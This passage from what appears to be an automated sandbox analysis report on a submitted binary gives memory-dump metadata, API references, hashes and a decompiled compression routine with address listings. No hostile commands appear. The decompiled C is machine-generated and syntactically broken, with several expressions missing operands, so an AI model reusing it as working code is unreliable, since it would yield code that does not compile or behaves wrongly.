0x00e87335
0x00e87323
0x00e872ff

APIs

memset.NTDLL ref: 00E872AB
memset.NTDLL ref: 00E872BC

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: bcc01bcba5cb1b6ff5f69939c2994683326eb7177842c69a48fcf5431e051b17
Instruction ID: 40e6278c75148c3aa7a0c592ebd00ca01f6f2b9e890268d56e8fdf3fda541379
Opcode Fuzzy Hash: bcc01bcba5cb1b6ff5f69939c2994683326eb7177842c69a48fcf5431e051b17
Instruction Fuzzy Hash: 0C023070505B108FCB35DF29C684666B7F1FF55724B202A2EC6EB96EA0D632F885CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00E88D50, Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL(?), ref: 00E88D6D
GetNativeSystemInfo.KERNEL32(?), ref: 00E88D77

Memory Dump Source

Source File: 00000000.00000002.197161113.0000000000E81000.00000020.00020000.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.197156447.0000000000E80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197170815.0000000000E8B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.197175636.0000000000E8C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.197180237.0000000000E8D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_0HvIGwMmBV.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: 24f242a4193ea93a094f77deacca04b6ded89f2ed49870d9461ec9ec53d54b69
Instruction ID: 9ee49504732c6f783bc418778a1b9684f1aa9b2b54accd16379915a595273741
Opcode Fuzzy Hash: 24f242a4193ea93a094f77deacca04b6ded89f2ed49870d9461ec9ec53d54b69
Instruction Fuzzy Hash: B9F03132D105184FF751CF6ACC496C8B7F9E789304F0481A0E42DF6609D6B4EA15DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E877F0, Relevance: .6, Instructions: 581
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00E877F0(intOrPtr* __ecx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				intOrPtr _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t390;
				void* _t402;
				signed int _t410;
				unsigned int* _t411;
				unsigned int* _t420;
				signed int _t432;
				unsigned int* _t434;
				unsigned int* _t451;
				unsigned int* _t453;
				void* _t463;
				void* _t480;
				signed int _t483;
				signed int _t494;
				signed char _t504;
				signed int _t508;
				signed int _t509;
				signed char _t510;
				signed int _t511;
				signed int _t513;
				signed int _t514;
				intOrPtr* _t516;
				intOrPtr* _t517;
				intOrPtr _t520;
				intOrPtr _t522;
				intOrPtr _t523;
				signed int _t524;
				signed int _t528;
				signed char* _t531;
				void* _t534;
				signed char _t538;
				signed char _t543;
				void* _t548;
				void* _t550;
				intOrPtr* _t551;
				intOrPtr _t555;
				intOrPtr _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				signed int _t564;
				intOrPtr* _t567;
				intOrPtr* _t571;
				intOrPtr _t572;
				signed int _t573;
				signed int _t575;
				signed int _t576;
				signed int _t579;
				signed int _t582;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				void* _t594;
				signed int _t595;
				signed int _t600;
				intOrPtr _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				intOrPtr* _t612;

				_t612 = __ecx;
				_v76 = __ecx;
				_t571 =  *((intOrPtr*)(__ecx + 0x84));
				_t601 =  *((intOrPtr*)(__ecx + 0x88));
				_t375 =  *((intOrPtr*)(__ecx + 0x80));
				_v12 = _t571;
				_v20 = _t601;
				_v48 = _t375;
				L2:
				while(_t601 != 0 || _t375 != 0 &&  *((intOrPtr*)(_t612 + 0x20)) != _t601) {
					_t520 =  *((intOrPtr*)(_t612 + 0x20));
					if( *((intOrPtr*)(_t612 + 0x24)) + _t520 < 2) {
						if(_t601 != 0) {
							while(1) {
								_t557 =  *((intOrPtr*)(_t612 + 0x20));
								if(_t557 >= 0x102) {
									goto L11;
								}
								_t601 = _t601 - 1;
								_t510 =  *_t571;
								_t483 =  *(_t612 + 0x1c) + _t557 & 0x00007fff;
								_v20 = _t601;
								_t571 = _t571 + 1;
								_v12 = _t571;
								 *(_t483 + _t612 + 0x90) = _t510;
								if(_t483 < 0x101) {
									 *(_t483 + _t612 + 0x8090) = _t510;
								}
								 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) + 1;
								_t558 =  *((intOrPtr*)(_t612 + 0x20));
								if( *((intOrPtr*)(_t612 + 0x24)) + _t558 >= 3) {
									_t608 =  *(_t612 + 0x1c) + _t558 + 0xfffffffd;
									_t579 = _t608 & 0x00007fff;
									_t89 = _t608 + 1; // 0x11
									_t564 = (( *(_t579 + _t612 + 0x90) & 0x000000ff) << 0x0000000a ^ _t510 & 0x000000ff) & 0x00007fff ^ ( *((_t89 & 0x00007fff) + _t612 + 0x90) & 0xff) << 0x00000005;
									 *((short*)(_t612 + 0x19272 + _t579 * 2)) =  *(_t612 + 0x29272 + _t564 * 2);
									_t571 = _v12;
									 *(_t612 + 0x29272 + _t564 * 2) = _t608;
									_t601 = _v20;
								}
								if(_t601 != 0) {
									continue;
								} else {
								}
								goto L11;
							}
						}
					} else {
						_t494 =  *(_t612 + 0x1c) + _t520;
						_t610 = _t494 & 0x00007fff;
						_t13 = _t494 - 2; // 0xe
						_t511 = _t13;
						_t16 = _t511 + 1; // 0xf
						_t582 = ( *((_t511 & 0x00007fff) + _t612 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t16 & 0x00007fff) + _t612 + 0x90) & 0x000000ff;
						_t502 =  <  ? _v20 : 0x102 - _t520;
						_v20 = _v20 - 0x102;
						_t503 = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						_v56 = _v12 + 0x102;
						_t567 = _v12;
						 *((intOrPtr*)(_t612 + 0x20)) = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						while(_t567 != _v56) {
							_t504 =  *_t567;
							_v12 = _t567 + 1;
							 *(_t612 + _t610 + 0x90) = _t504;
							if(_t610 < 0x101) {
								 *(_t610 + _t612 + 0x8090) = _t504;
							}
							_t582 = (_t582 << 0x00000005 ^ _t504 & 0x000000ff) & 0x00007fff;
							_t610 = _t610 + 0x00000001 & 0x00007fff;
							 *((short*)(_t612 + 0x19272 + (_t511 & 0x00007fff) * 2)) =  *(_t612 + 0x29272 + _t582 * 2);
							_t567 = _v12;
							 *(_t612 + 0x29272 + _t582 * 2) = _t511;
							_t511 = _t511 + 1;
						}
						_t601 = _v20;
					}
					L11:
					_t572 =  *((intOrPtr*)(_t612 + 0x20));
					_t522 =  <  ? 0x8000 - _t572 :  *((intOrPtr*)(_t612 + 0x24));
					_v24 = _t522;
					 *((intOrPtr*)(_t612 + 0x24)) = _t522;
					if(_v48 != 0 || _t572 >= 0x102) {
						_t380 =  *((intOrPtr*)(_t612 + 0x50));
						_t602 = 0;
						_v64 = _t380;
						_v56 = 1;
						_t508 =  !=  ? _t380 : 2;
						_v8 = 0;
						_t381 =  *(_t612 + 0x1c);
						_v28 = _t381;
						_v28 = _v28 & 0x00007fff;
						_v16 = 2;
						if(( *(_t612 + 8) & 0x00090000) == 0) {
							_t382 = _t381 & 0x00007fff;
							_t523 = _v24;
							_v32 = _t382;
							_t603 = _t382;
							_v52 = 2;
							asm("sbb eax, eax");
							_v60 =  *((intOrPtr*)(_t612 + 0x10 + _t382 * 4));
							_v72 = _t612 + 0x90;
							_v44 =  *(_t603 + 2 + _t612 + 0x8f) & 0x0000ffff;
							_v68 =  *(_t612 + _t603 + 0x90) & 0x0000ffff;
							if(_t572 > 2) {
								while(1) {
									_t125 =  &_v60;
									 *_t125 = _v60 - 1;
									if( *_t125 == 0) {
										goto L33;
									}
									_t604 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
									if(_t604 == 0) {
										goto L33;
									} else {
										_t592 =  *(_t612 + 0x1c) - _t604 & 0x0000ffff;
										_v40 = _t592;
										if(_t592 > _t523) {
											goto L33;
										} else {
											_t603 = _t604 & 0x00007fff;
											_t548 = _v52 + _t612;
											if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
												L51:
												if(_t592 == 0) {
													goto L33;
												} else {
													_t523 = _v24;
													_t516 = _t612 + 0x90 + _t603;
													if( *_t516 != _v68) {
														_t508 = _v16;
														continue;
													} else {
														_t550 = _v32 + _t612 + 0x90;
														_t594 = 0x20;
														while(1) {
															_t160 = _t550 + 2; // 0x7401fe83
															_t551 = _t550 + 2;
															_t517 = _t516 + 2;
															if( *_t160 !=  *_t517) {
																break;
															}
															_t161 = _t551 + 2; // 0xfe83f08b
															_t551 = _t551 + 2;
															_t517 = _t517 + 2;
															if( *_t161 ==  *_t517) {
																_t162 = _t551 + 2; // 0xf08bffff
																_t551 = _t551 + 2;
																_t517 = _t517 + 2;
																if( *_t162 ==  *_t517) {
																	_t163 = _t551 + 2; // 0xfffffe61
																	_t551 = _t551 + 2;
																	_t517 = _t517 + 2;
																	if( *_t163 ==  *_t517) {
																		_t594 = _t594 - 1;
																		if(_t594 != 0) {
																			continue;
																		}
																	}
																}
															}
															break;
														}
														_v36 = _t551;
														_t595 = _v40;
														if(_t594 == 0) {
															_t602 = _t595;
															_t508 =  <  ?  *((void*)(_t612 + 0x20)) : 0x102;
															_v16 = 0x102;
															goto L34;
														} else {
															_t612 = _v76;
															_t508 = _v16;
															_t463 = (0 |  *_t551 ==  *_t517) + (_t551 - _v72 + _v32 >> 1) * 2;
															_t523 = _v24;
															if(_t463 <= _v52) {
																continue;
															} else {
																_v8 = _v40;
																_t555 =  *((intOrPtr*)(_t612 + 0x20));
																_t600 =  <  ? _t555 : _t463;
																_v52 = _t600;
																_t508 = _t600;
																_v16 = _t508;
																if(_t600 == _t555) {
																	goto L33;
																} else {
																	_t523 = _v24;
																	_t184 = _t612 + 0x8f; // 0xe8279020
																	_v44 =  *(_v32 + _t600 + _t184) & 0x0000ffff;
																	continue;
																}
															}
														}
													}
												}
											} else {
												_t605 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
												if(_t605 == 0) {
													goto L33;
												} else {
													_t592 =  *(_t612 + 0x1c) - _t605 & 0x0000ffff;
													_v40 = _t592;
													if(_t592 > _v24) {
														goto L33;
													} else {
														_t603 = _t605 & 0x00007fff;
														if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
															goto L51;
														} else {
															_t606 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
															if(_t606 == 0) {
																goto L33;
															} else {
																_t592 =  *(_t612 + 0x1c) - _t606 & 0x0000ffff;
																_v40 = _t592;
																if(_t592 > _v24) {
																	goto L33;
																} else {
																	_t603 = _t606 & 0x00007fff;
																	_t523 = _v24;
																	if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) != _v44) {
																		continue;
																	} else {
																		goto L51;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									L95:
									 *(_t612 + 0x1c) =  *(_t612 + 0x1c) + _t528;
									 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) - _t528;
									_t402 =  *((intOrPtr*)(_t612 + 0x24)) + _t528;
									_t530 =  <  ? _t402 : 0x8000;
									 *((intOrPtr*)(_t612 + 0x24)) =  <  ? _t402 : 0x8000;
									_t531 =  *(_t612 + 0x28);
									if(_t531 > _t612 + 0x1926a) {
										L99:
										_t601 = _v20;
										 *((intOrPtr*)(_t612 + 0x84)) = _v12;
										 *((intOrPtr*)(_t612 + 0x88)) = _t601;
										_t534 = E00E86E70(_t612, 0);
										if(_t534 != 0) {
											return 0 | _t534 > 0x00000000;
										} else {
											_t375 = _v48;
											goto L1;
										}
									} else {
										_t585 =  *((intOrPtr*)(_t612 + 0x3c));
										_t601 = _v20;
										_t375 = _v48;
										if(_t585 <= 0x7c00) {
											L1:
											_t571 = _v12;
											goto L2;
										} else {
											if((_t531 - _t612 - 0x9272) * 0x73 >> 7 >= _t585) {
												goto L99;
											} else {
												_t375 = _v48;
												if(( *(_t612 + 8) & 0x00080000) == 0) {
													goto L1;
												} else {
													goto L99;
												}
											}
										}
									}
									goto L103;
								}
								goto L33;
							} else {
								L33:
								_t602 = _v8;
							}
							goto L34;
						} else {
							if(_t522 == 0 || ( *(_t612 + 8) & 0x00080000) != 0) {
								L34:
								if(_t508 != 3 || _t602 < 0x2000) {
									goto L36;
								} else {
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									goto L65;
								}
							} else {
								_t508 = 0;
								_v16 = 0;
								_t556 =  *((intOrPtr*)((_v28 - 0x00000001 & 0x00007fff) + _t612 + 0x90));
								if(_t572 == 0) {
									L31:
									_t508 = 0;
									_v16 = 0;
									L36:
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									if(_t573 == _t602) {
										L65:
										_t508 = 0;
										_t602 = 0;
										_v16 = 0;
									} else {
										if((_t524 & 0x00020000) != 0 && _t508 <= 5) {
											goto L65;
										}
									}
								} else {
									_t480 = _v28 + _t612;
									while( *((intOrPtr*)(_t480 + _t508 + 0x90)) == _t556) {
										_t508 = _t508 + 1;
										if(_t508 < _t572) {
											continue;
										}
										break;
									}
									_v16 = _t508;
									if(_t508 < 3) {
										goto L31;
									} else {
										_t602 = 1;
										goto L34;
									}
								}
							}
						}
						_t390 = _v64;
						if(_t390 == 0) {
							if(_t602 != 0) {
								if( *((intOrPtr*)(_t612 + 0x14)) != 0 || (_t524 & 0x00010000) != 0 || _t508 >= 0x80) {
									_t316 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t319 = _t602 - 1; // -1
									_t509 = _t319;
									_t575 = _t509 >> 8;
									 *( *(_t612 + 0x28)) = _t316;
									( *(_t612 + 0x28))[1] = _t509;
									( *(_t612 + 0x28))[2] = _t575;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t327 = _t612 + 0x38;
									 *_t327 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t327 == 0) {
										_t411 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t411;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t411[0]);
									}
									_t576 = _t575 & 0x0000007f;
									_t333 = (_t509 & 0x000001ff) + 0xe8b220; // 0x201001d
									_t334 = _t576 + 0xe8b1a0; // 0x12000000
									_t400 =  <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										_t410 =  *(0xe8b41a + _t528 * 2) & 0x0000ffff;
										goto L94;
									}
								} else {
									_t528 = _v56;
									_t414 =  <  ? _t573 : 0x8100;
									 *(_t612 + 0x54) =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								}
							} else {
								_t417 =  <  ? _t573 : 0x8100;
								_t538 =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t538;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t299 = _t612 + 0x38;
								 *_t299 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t299 == 0) {
									_t420 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t420;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t420[0]);
								}
								_t410 = _t538 & 0x000000ff;
								_t528 = _v56;
								L94:
								 *((short*)(_t612 + 0x8192 + _t410 * 2)) =  *((short*)(_t612 + 0x8192 + _t410 * 2)) + 1;
							}
						} else {
							if(_t508 <= _t390) {
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t390;
								_t513 =  *((intOrPtr*)(_t612 + 0x4c)) - 1;
								 *( *(_t612 + 0x28)) = _t390 - 3;
								_t587 = _t513 >> 8;
								( *(_t612 + 0x28))[1] = _t513;
								( *(_t612 + 0x28))[2] = _t587;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
								_t266 = _t612 + 0x38;
								 *_t266 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t266 == 0) {
									_t434 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t434;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t434[0]);
								}
								_t431 =  <  ?  *((_t513 & 0x000001ff) + 0xe8b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0xe8b1a0) & 0x000000ff;
								 *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0xe8b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0xe8b1a0) & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0xe8b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0xe8b1a0) & 0x000000ff) * 2)) + 1;
								_t432 = _v64;
								if(_t432 >= 3) {
									 *((short*)(_t612 + 0x8192 + ( *(0xe8b41a + _t432 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0xe8b41a + _t432 * 2) & 0x0000ffff) * 2)) + 1;
								}
								_t528 =  *((intOrPtr*)(_t612 + 0x50)) - 1;
								 *((intOrPtr*)(_t612 + 0x50)) = 0;
							} else {
								_t543 =  *(_t612 + 0x54);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t543;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t200 = _t612 + 0x38;
								 *_t200 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t200 == 0) {
									_t453 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t453;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t453[0]);
								}
								 *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) + 1;
								if(_t508 < 0x80) {
									_t528 = _v56;
									 *(_t612 + 0x54) =  *(_t573 + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								} else {
									_t213 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t216 = _t602 - 1; // -1
									_t514 = _t216;
									_t590 = _t514 >> 8;
									 *( *(_t612 + 0x28)) = _t213;
									( *(_t612 + 0x28))[1] = _t514;
									( *(_t612 + 0x28))[2] = _t590;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t224 = _t612 + 0x38;
									 *_t224 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t224 == 0) {
										_t451 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t451;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t451[0]);
									}
									_t591 = _t590 & 0x0000007f;
									_t230 = (_t514 & 0x000001ff) + 0xe8b220; // 0x201001d
									_t231 = _t591 + 0xe8b1a0; // 0x12000000
									_t449 =  <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										 *((short*)(_t612 + 0x8192 + ( *(0xe8b41a + _t528 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0xe8b41a + _t528 * 2) & 0x0000ffff) * 2)) + 1;
									}
									 *((intOrPtr*)(_t612 + 0x50)) = 0;
								}
							}
						}
						goto L95;
					} else {
						break;
					}
					L103:
				}
				 *((intOrPtr*)(_t612 + 0x88)) = _t601;
				 *((intOrPtr*)(_t612 + 0x84)) = _v12;
				return 1;
				goto L103;
			}

0x00e877f8
0x00e877fb
0x00e877fe
0x00e87804
0x00e8780a
0x00e87810
0x00e87813
0x00e87816
0x00000000
0x00e87820
0x00e87838
0x00e87840
0x00e879c6
0x00e879d0
0x00e879d0
0x00e879d9
0x00000000
0x00000000
0x00e879e2
0x00e879e3
0x00e879e7
0x00e879ec
0x00e879ef
0x00e879f0
0x00e879f3
0x00e879ff
0x00e87a01
0x00e87a01
0x00e87a08
0x00e87a0e
0x00e87a16
0x00e87a1e
0x00e87a25
0x00e87a38
0x00e87a56
0x00e87a60
0x00e87a68
0x00e87a6b
0x00e87a73
0x00e87a73
0x00e87a78
0x00000000
0x00000000
0x00e87a7e
0x00000000
0x00e87a78
0x00e879d0
0x00e87846
0x00e87849
0x00e8784d
0x00e87853
0x00e87853
0x00e87865
0x00e87878
0x00e87887
0x00e8788b
0x00e87890
0x00e87893
0x00e87896
0x00e87899
0x00e8789f
0x00e878a1
0x00e878a4
0x00e878a7
0x00e878b4
0x00e878b6
0x00e878b6
0x00e878ce
0x00e878d4
0x00e878e2
0x00e878ea
0x00e878ed
0x00e878f5
0x00e878f6
0x00e878fb
0x00e878fb
0x00e878fe
0x00e878fe
0x00e8790d
0x00e87914
0x00e87917
0x00e8791a
0x00e87928
0x00e8792b
0x00e8792f
0x00e87937
0x00e8793e
0x00e87941
0x00e87944
0x00e87947
0x00e8794a
0x00e87958
0x00e8795b
0x00e87a8a
0x00e87a8f
0x00e87a92
0x00e87a95
0x00e87a9a
0x00e87a9d
0x00e87aa3
0x00e87aac
0x00e87abb
0x00e87ac8
0x00e87acd
0x00e87b13
0x00e87b13
0x00e87b13
0x00e87b16
0x00000000
0x00000000
0x00e87b18
0x00e87b22
0x00000000
0x00e87b24
0x00e87b29
0x00e87b2c
0x00e87b31
0x00000000
0x00e87b33
0x00e87b36
0x00e87b3f
0x00e87b49
0x00e87bc0
0x00e87bc2
0x00000000
0x00e87bc8
0x00e87bd1
0x00e87bd4
0x00e87bd9
0x00e87b10
0x00000000
0x00e87bdf
0x00e87be8
0x00e87bea
0x00e87bf0
0x00e87bf0
0x00e87bf4
0x00e87bf7
0x00e87bfd
0x00000000
0x00000000
0x00e87bff
0x00e87c03
0x00e87c06
0x00e87c0c
0x00e87c0e
0x00e87c12
0x00e87c15
0x00e87c1b
0x00e87c1d
0x00e87c21
0x00e87c24
0x00e87c2a
0x00e87c2c
0x00e87c2d
0x00000000
0x00000000
0x00e87c2d
0x00e87c2a
0x00e87c1b
0x00000000
0x00e87c0c
0x00e87c31
0x00e87c34
0x00e87c37
0x00e87ca0
0x00e87ca5
0x00e87ca9
0x00000000
0x00e87c39
0x00e87c41
0x00e87c4e
0x00e87c54
0x00e87c57
0x00e87c5d
0x00000000
0x00e87c63
0x00e87c68
0x00e87c6b
0x00e87c70
0x00e87c73
0x00e87c76
0x00e87c78
0x00e87c7d
0x00000000
0x00e87c83
0x00e87c86
0x00e87c8b
0x00e87c93
0x00000000
0x00e87c93
0x00e87c7d
0x00e87c5d
0x00e87c37
0x00e87bd9
0x00e87b4b
0x00e87b4b
0x00e87b55
0x00000000
0x00e87b5b
0x00e87b60
0x00e87b63
0x00e87b69
0x00000000
0x00e87b6f
0x00e87b72
0x00e87b80
0x00000000
0x00e87b82
0x00e87b82
0x00e87b8c
0x00000000
0x00e87b92
0x00e87b97
0x00e87b9a
0x00e87ba0
0x00000000
0x00e87ba6
0x00e87ba9
0x00e87bb7
0x00e87bba
0x00000000
0x00000000
0x00000000
0x00000000
0x00e87bba
0x00e87ba0
0x00e87b8c
0x00e87b80
0x00e87b69
0x00e87b55
0x00e87b49
0x00e87b31
0x00e87f55
0x00e87f55
0x00e87f58
0x00e87f5e
0x00e87f67
0x00e87f70
0x00e87f73
0x00e87f78
0x00e87fb1
0x00e87fb6
0x00e87fb9
0x00e87fc1
0x00e87fcc
0x00e87fd0
0x00e88002
0x00e87fd2
0x00e87fd2
0x00000000
0x00e87fd2
0x00e87f7a
0x00e87f7a
0x00e87f7d
0x00e87f80
0x00e87f89
0x00e8781b
0x00e8781b
0x00000000
0x00e87f8f
0x00e87f9f
0x00000000
0x00e87fa1
0x00e87fa8
0x00e87fab
0x00000000
0x00000000
0x00000000
0x00000000
0x00e87fab
0x00e87f9f
0x00e87f89
0x00000000
0x00e87f78
0x00000000
0x00e87acf
0x00e87acf
0x00e87acf
0x00e87acf
0x00000000
0x00e87961
0x00e87963
0x00e87ad2
0x00e87ad5
0x00000000
0x00e87cb1
0x00e87cb1
0x00e87cb4
0x00000000
0x00e87cb4
0x00e87976
0x00e87979
0x00e8797c
0x00e87984
0x00e8798d
0x00e87a83
0x00e87a83
0x00e87a85
0x00e87ae3
0x00e87ae3
0x00e87ae6
0x00e87aeb
0x00e87cb7
0x00e87cb7
0x00e87cb9
0x00e87cbb
0x00e87af1
0x00e87af7
0x00000000
0x00e87b06
0x00e87af7
0x00e87993
0x00e87996
0x00e879a0
0x00e879a9
0x00e879ac
0x00000000
0x00000000
0x00000000
0x00e879ac
0x00e879ae
0x00e879b4
0x00000000
0x00e879ba
0x00e879ba
0x00000000
0x00e879ba
0x00e879b4
0x00e8798d
0x00e87963
0x00e87cbe
0x00e87cc3
0x00e87e53
0x00e87e9b
0x00e87ed3
0x00e87ed6
0x00e87ed9
0x00e87ed9
0x00e87ede
0x00e87ee1
0x00e87ee6
0x00e87eec
0x00e87ef2
0x00e87efc
0x00e87efe
0x00e87efe
0x00e87f01
0x00e87f03
0x00e87f06
0x00e87f0a
0x00e87f11
0x00e87f11
0x00e87f16
0x00e87f24
0x00e87f2b
0x00e87f32
0x00e87f35
0x00e87f38
0x00e87f43
0x00e87f45
0x00000000
0x00e87f45
0x00e87ead
0x00e87ead
0x00e87eb7
0x00e87ec2
0x00e87ec5
0x00e87ec8
0x00e87ec8
0x00e87e55
0x00e87e5c
0x00e87e5f
0x00e87e69
0x00e87e6c
0x00e87e71
0x00e87e74
0x00e87e76
0x00e87e76
0x00e87e79
0x00e87e7b
0x00e87e7e
0x00e87e82
0x00e87e89
0x00e87e89
0x00e87e8c
0x00e87e8f
0x00e87f4d
0x00e87f4d
0x00e87f4d
0x00e87cc9
0x00e87ccb
0x00e87dbb
0x00e87dc7
0x00e87dca
0x00e87dcf
0x00e87dd2
0x00e87dd8
0x00e87dde
0x00e87de8
0x00e87dea
0x00e87dea
0x00e87ded
0x00e87def
0x00e87df2
0x00e87df6
0x00e87dfd
0x00e87dfd
0x00e87e1e
0x00e87e21
0x00e87e29
0x00e87e2f
0x00e87e39
0x00e87e39
0x00e87e44
0x00e87e45
0x00e87cd1
0x00e87cd4
0x00e87cd7
0x00e87cda
0x00e87cdf
0x00e87ce2
0x00e87ce4
0x00e87ce4
0x00e87ce7
0x00e87ce9
0x00e87cec
0x00e87cf0
0x00e87cf7
0x00e87cf7
0x00e87cfd
0x00e87d0b
0x00e87daa
0x00e87dad
0x00e87db0
0x00e87db3
0x00e87d11
0x00e87d14
0x00e87d17
0x00e87d1a
0x00e87d1a
0x00e87d1f
0x00e87d22
0x00e87d27
0x00e87d2d
0x00e87d33
0x00e87d3d
0x00e87d3f
0x00e87d3f
0x00e87d42
0x00e87d44
0x00e87d47
0x00e87d4b
